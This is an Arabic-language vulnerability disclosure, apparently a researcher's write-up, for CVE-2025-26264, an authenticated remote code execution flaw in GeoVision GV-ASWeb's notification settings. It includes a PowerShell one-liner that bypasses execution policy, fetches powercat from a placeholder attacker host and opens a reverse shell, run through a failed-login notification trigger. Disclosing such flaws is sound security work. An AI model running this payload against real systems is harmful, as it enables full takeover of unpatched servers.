
CVE-2025-26264 - GeoVision GV-ASWeb بإصدار 6.1.2.0 أو أقل، يحتوي على ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) ضمن ميزة إعدادات الإشعارات الخاصة به. يمكن للمهاجم المُصادَق الذي يمتلك صلاحيات "إعدادات النظام" في ASWeb استغلال هذا الخلل لتنفيذ أوامر عشوائية على الخادم، مما يؤدي إلى اختراق كامل للنظام.
CVE-2025-26264 - يحتوي GeoVision GV-ASWeb بإصدار 6.1.2.0 أو أقل على ثغرة تنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution - RCE) ضمن ميزة إعدادات الإشعارات (Notification Settings). يمكن لمهاجم مُصادق يتمتع بصلاحيات "إعدادات النظام" (System Settings) في ASWeb استغلال هذا الخلل لتنفيذ أوامر عشوائية على الخادم، مما يؤدي إلى اختراق كامل للنظام.
لتنفيذ هجوم ناجح، يحتاج المهاجم إلى:
يمكن استغلال الثغرة لتنفيذ الإجراءات غير المصرح بها التالية:
يمكن استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد في منصة ASWeb التابعة لـ GeoVision GV-ASManager ضد الإصدارات 6.1.2.0 أو أقل (لا يوجد إصلاح حتى 26 فبراير 2025).
إن ميزة إعدادات الإشعارات (Notification Setting) في ASWeb التابعة لـ GeoVision ASManager معرضة لثغرة RCE
طلب HTTP لإعداد إشعار على حدث معين: محاولة تسجيل دخول فاشلة إلى TAWeb
وفقًا لهذا السكربت، إذا كانت هناك محاولة تسجيل دخول فاشلة إلى TAWeb، فسيتم تنفيذ سكربت PowerShell التالي:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
محاولة مصادقة فاشلة في TAWeb
مضيف الضحية: يفتح السكربت بابًا خلفيًا إلى مضيف المهاجم.
مضيف المهاجم: يحصل المهاجم على شل (Shell)
إذا كان لديك سؤال، يمكنك التواصل معي، Giorgi Dograshvili على LinkedIn.